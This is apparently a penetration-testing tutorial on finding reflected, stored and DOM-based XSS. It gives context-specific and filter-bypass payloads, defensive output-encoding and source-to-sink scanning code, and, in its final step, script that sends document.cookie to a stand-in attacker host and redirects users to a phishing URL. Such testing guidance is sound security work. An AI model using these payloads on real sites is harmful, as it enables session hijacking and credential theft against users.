Learn how to test for reflected, stored, and DOM-based XSS vulnerabilities with step-by-step methodology, payload examples, and remediation guidance.
Map all user-controlled inputs that reflect in the HTTP response. Check URL parameters, form fields, HTTP headers (Referer, User-Agent), and cookie values. Use your browser's DevTools to search the page source for your input string.
testpayload12345
<b>test</b>
"><test
Analyze where your input lands in the HTML. The context determines which payloads will work: HTML body, inside an attribute, within a script block, or in a URL. View the page source to identify the exact context.
<!-- HTML body --> <script>alert(1)</script>
<!-- Attribute --> " onfocus=alert(1) autofocus="
<!-- JavaScript --> ';alert(1);//
<!-- URL --> javascript:alert(1)
Start with simple payloads to check if any filtering or encoding exists. If basic payloads are blocked, note which characters or keywords are filtered to plan bypass techniques.
<script>alert(document.domain)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<details open ontoggle=alert(1)>
If input is sanitized, try encoding (HTML entities, URL encoding, Unicode), case variation, tag/event alternatives, and payload obfuscation. Test for incomplete sanitization, such as a filter that strips a blocked tag only once (non-recursive stripping), which a nested tag survives.
<ScRiPt>alert(1)</ScRiPt>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<<script>script>alert(1)<</script>/script>
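The context step and the filter-bypass step above make the same defensive point from two sides: a blocklist of tags and keywords can be worked around, while encoding the value for the exact context it lands in cannot. The following is an added example, not code from the original page, showing one encoder per context (HTML body, quoted attribute, JavaScript string, URL). The function names are my own; each encoder is applied to the payload shape listed for its context so the neutralised output can be compared with the raw payload.

```javascript
// Added example, not code from the original page: context-aware output
// encoding, the defensive counterpart to the four injection contexts above.
// Each encoder neutralises the payload shape that works in its context; the
// caller must pick the encoder for the context the value actually lands in.

// HTML body context: escape the five characters that can break out of text.
function encodeHtmlBody(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Attribute context: same escaping, and the attribute must always be quoted.
// In an unquoted attribute a space starts a new attribute, which is how the
// " onfocus=alert(1) autofocus=" payload works even when quotes are escaped.
function encodeHtmlAttribute(value) {
  return encodeHtmlBody(value);
}

// JavaScript string context: hex/unicode-escape every non-alphanumeric
// character so the value can neither close the string literal nor end the
// statement (the ';alert(1);// shape).
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// URL context, whole-URL case (href/src): allow only relative URLs and
// http(s); any other scheme, javascript: included, is rejected. Whitespace
// and control characters are removed before the scheme check because
// browsers strip them, so a "java\tscript:" URL would otherwise slip through.
function safeHref(url) {
  const cleaned = String(url).replace(/[\u0000-\u0020]/g, '');
  const scheme = cleaned.match(/^([a-z][a-z0-9+.-]*):/i);
  if (scheme && !/^https?$/i.test(scheme[1])) {
    return null; // rejected: the caller falls back to a safe default
  }
  return cleaned;
}

// URL context, parameter-value case: percent-encode the value so it cannot
// add or alter query parameters.
function encodeUrlParam(value) {
  return encodeURIComponent(String(value));
}
```

The encoders only help when they match the context: HTML-entity encoding a value that is written into a script block does nothing for the `';alert(1);//` payload, and JavaScript-string encoding does nothing for a value placed in an `href`. That mismatch, not the absence of encoding, is the usual root cause when a filter exists and a bypass from the list above still works.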
Check for JavaScript that uses dangerous sinks (innerHTML, document.write, eval) with user-controlled sources (location.hash, location.search, document.referrer). Use browser DevTools to trace data flow from sources to sinks.
#<img src=x onerror=alert(1)>
?default=<script>alert(1)</script>
javascript:alert(document.domain)
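Tracing sources to sinks in DevTools is manual; the same flows can be surfaced during code review with a line-based heuristic. The following is an added example, not code from the original page: a small JavaScript check that flags lines where a DOM source (or a variable initialised from one) reaches a sink such as innerHTML, document.write or eval. The source and sink lists, the function names and the SAMPLE_JS input are my own constructions; the sample mirrors the ?default= and # injection points listed above and includes a safe textContent use for contrast. It follows one level of assignment and is a review aid, not a parser.

```javascript
// Added example, not code from the original page: a heuristic code-review
// check that flags lines where a user-controlled DOM source (or a variable
// initialised from one) reaches a dangerous sink. Names below are my own.

// Sources the page lists plus a few other attacker-influenced properties.
const DOM_SOURCES = ['location.hash', 'location.search', 'location.href',
  'document.referrer', 'document.URL', 'window.name'];
// Sinks that interpret their argument as HTML or code.
const DOM_SINKS = ['innerHTML', 'outerHTML', 'insertAdjacentHTML',
  'document.write', 'eval'];

// Whole-token match so that e.g. "retrieval" does not count as eval.
function mentions(line, name) {
  const escaped = name.replace(/[.$]/g, '\\$&');
  return new RegExp('\\b' + escaped + '\\b').test(line);
}

// Returns [{ line, sinks, sources }] for every line that combines a sink with
// a source or a tainted variable. Taint propagates through simple
// `const|let|var x = <expression containing a source>` declarations only.
function findDomXssCandidates(jsSource) {
  const findings = [];
  const tainted = new Set();
  jsSource.split('\n').forEach((line, idx) => {
    const sources = DOM_SOURCES.filter((s) => mentions(line, s));
    for (const name of tainted) {
      if (mentions(line, name)) sources.push(name);
    }
    const decl = line.match(/\b(?:const|let|var)\s+([A-Za-z_$][\w$]*)\s*=/);
    if (decl && sources.length > 0) tainted.add(decl[1]);
    const sinks = DOM_SINKS.filter((k) => mentions(line, k));
    if (sinks.length > 0 && sources.length > 0) {
      findings.push({ line: idx + 1, sinks, sources });
    }
  });
  return findings;
}

// Constructed sample, not real application code: two unsafe flows and two
// safe uses of the same data.
const SAMPLE_JS = [
  'const q = new URLSearchParams(location.search).get("default");',
  'document.getElementById("lang").innerHTML = q;',               // flagged
  'document.getElementById("label").textContent = q;',           // safe sink
  'document.write(decodeURIComponent(location.hash.slice(1)));', // flagged
  'const ref = document.referrer;',
  'console.log(ref.length);',                                    // not a sink
].join('\n');

console.log(findDomXssCandidates(SAMPLE_JS));
```

Running it on SAMPLE_JS reports lines 2 and 4. The fix for both is the one the contrast line shows: write untrusted text through textContent (or build nodes with createElement and setAttribute) rather than through a sink that parses HTML, and keep eval and document.write out of code paths that touch location or referrer data.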
Confirm the XSS executes in a victim's browser context. Document the payload, affected URL, injection point, and potential impact (session hijacking, credential theft, defacement). Test in multiple browsers for consistency.
<script>fetch("https://attacker.com/log?c="+document.cookie)</script>
<script>document.location="https://attacker.com/phish"</script>